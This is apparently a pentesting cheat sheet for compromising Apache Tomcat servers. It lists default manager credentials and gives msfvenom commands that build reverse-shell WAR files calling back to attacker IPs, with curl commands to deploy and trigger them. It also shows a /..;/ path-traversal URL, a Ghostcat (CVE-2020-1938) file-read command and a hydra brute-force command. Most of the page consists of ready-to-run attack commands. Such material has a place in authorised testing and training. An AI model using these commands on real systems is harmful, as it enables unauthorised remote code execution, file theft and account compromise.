Apache Tomcat

Introduction

Tomcat Manager Application is a Java-Based HTTP Web Server, that uses Web Application Archive (WAR) files. These files contain Java Servlets and JavaServer Pages(JSP) which add functionality to the application.

If an attacker gains attackers gains access to the Tomcat Manager Application due to default credentials tomcat:s3cret or weak credentials, the attacker could gain RCE by uploading a malicious WAR file.

Reverse shell

You can use Msfvenom to create your own .war file that contains a reverse shell.

# Linux
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.122 LPORT=443 -f war -o revshell.war
# Windows
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.15.83 LPORT=9002 -f war > revshell.war

Then, accessing /manager/html you can deploy the WAR file, which once accessed you will obtain a reverse shell.

Upload via curl

If the tomcat server is misconfigured or you have access to the tomcat service with localhost, you could deploy/undeploy a reverse shell without accessing the web interface.

# Deploy
curl --user '<USER>:<PASSWORD>' --upload-file shell.war <TARGET_IP>:8080/manager/deploy?path=/shell
curl http://<TARGET_IP>:8080/shell/ # The reverse shell endpoint

# Undeploy
curl "http://<USER>:<PASSWORD>@localhost:8080/manager/text/undeploy?path=/revereshell"

Tomcat path traversal

When Apache Tomcat is used together with a reverse proxy, Tomcat will treat the sequence /..;/ as /../ allowing the attacker to access Tomcat resources that are not normally accessible via the reverse proxy mapping.

https://<TARGET_IP>/manager/status/..;/html/

GhosCat (CVE-2020-1938)

CVE-2020-1938 allows an unauthenticated attacker to read web application files from a vulnerable server through port 8009.

python3 ajpShooter.py http://<TARGET_IP>:8080 8009 /WEB-INF/web.xml read

Brute forcing

Use it as your last resource because you might block the account.

hydra -L <USERS.txt> -P <PASWORDS.txt> http-get://<TARGET_IP>:8080/manager/html

References

Last updated 2 years ago